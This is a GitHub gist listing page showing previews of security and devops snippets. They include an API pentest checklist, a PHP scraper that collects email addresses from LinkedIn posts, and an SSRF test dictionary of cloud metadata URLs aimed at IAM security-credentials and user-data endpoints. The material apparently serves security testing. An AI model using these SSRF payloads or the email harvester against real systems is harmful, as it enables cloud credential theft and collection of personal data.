Magno Logan magnologan
magnologan
/ API_checklist.csv
Created
March 25, 2021 00:46
— forked from juniotee/API_checklist.csv
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ID | Test name | Domain | Owasp API Top Ten | |
|---|---|---|---|---|
| 1 | Test user enumeration (if applicable) | Authorization | A1, A3 | |
| 2 | Exploit vulnerabilities to gain unauthorized access | Authorization | A2 | |
| 3 | Transmission of sensitive information (token, credentials, etc.) in an insecure manner | Integrity/Confidentiality | A1 | |
| 4 | Test for specific data entry vulnerabilities | Data validation | A8 | |
| 5 | Perform fuzzing on all request parameters (sending malicious information, for example) | Data validation | A8 | |
| 6 | Test for injection vulnerabilities (SQLi, LDAP, XML, Xpath, XXE if applicable) | Data validation | A8 | |
| 7 | Testing for buffer overflow vulnerabilities | Data validation | A8 | |
| 8 | Test for logic failures (if applicable) | Data validation | A6 | |
| 9 | Test how the application behaves by receiving incomplete information | Data validation | A6 |
magnologan
/ GatheringEmailLinkedin.php
Created
March 16, 2021 10:35
— forked from MrCl0wnLab/GatheringEmailLinkedin.php
Email Information Gathering in Post Linkedin
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $targets = array_unique(explode("\n",file_get_contents("posts.targets"))); | |
| $user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'; | |
| foreach ($targets as $key => $url_target) { | |
| #REQUEST PEGANDO ID | |
| exec("curl -kg --user-agent '{$user_agent}' '{$url_target}'>tmp"); | |
| #GREP ID |
magnologan
/ AWS API calls that return credentials.md
Created
February 20, 2021 14:52
— forked from kmcquade/AWS API calls that return credentials.md
AWS API calls that return credentials
magnologan
/ aws-us-east-1-iplist.sh
Created
February 17, 2021 00:22
— forked from joswr1ght/aws-us-east-1-iplist.sh
Get AWS IP Addresses for a Specified Area
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget -qO- https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes[] | if .region == "us-east-1" then .ip_prefix else empty end' -r | head -3 |
magnologan
/ bb-foxyproxy-pattern.json
Created
February 12, 2021 16:43
— forked from ignis-sec/bb-foxyproxy-pattern.json
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "30523382": { | |
| "className": "Proxy", | |
| "data": { | |
| "bypassFPForPAC": true, | |
| "color": "#f57575", | |
| "configUrl": "", | |
| "credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
| "cycle": false, | |
| "enabled": true, |
magnologan
/ CSM_pocs.md
Created
November 24, 2020 20:15
— forked from Frycos/CSM_pocs.md
Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.
Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.
magnologan
/ cloud_metadata.txt
Created
November 16, 2020 23:30
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
magnologan
/ vpc-fargate.yaml
Created
September 1, 2020 16:18
— forked from lizrice/vpc-fargate.yaml
Cloudformation template for setting up VPC and subnets for Fargate
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: | |
| # aws cloudformation --region <region> create-stack --stack-name <stack name> --template-body file://vpc-fargate.yaml | |
| # This template will: | |
| # Create a VPC with: | |
| # 2 Public Subnets | |
| # 2 Private Subnets | |
| # An Internet Gateway (with routes to it for Public Subnets) | |
| # A NAT Gateway for outbound access (with routes from Private Subnets set to use it) | |
| # |
magnologan
/ gist:910ea336f3c4e91c636934355b2b9ad9
Created
April 20, 2020 17:41
— forked from CristinaSolana/gist:1885435
Keeping a fork up to date
git clone [email protected]:YOUR-USERNAME/YOUR-FORKED-REPO.git
cd into/cloned/fork-repo
git remote add upstream git://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream
magnologan
/ copymysql.sh
Created
March 6, 2020 20:06
— forked from ecdundar/copymysql.sh
Copy MySQL Database One Server (Remote) To Another (Local) Server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # copymysql.sh | |
| # GENERATED WITH USING ARTUR BODERA'S SCRIPT | |
| # Source script at: https://gist.github.com/2215200 | |
| MYSQLDUMP="/usr/bin/mysqldump" | |
| MYSQL="/usr/bin/mysql" |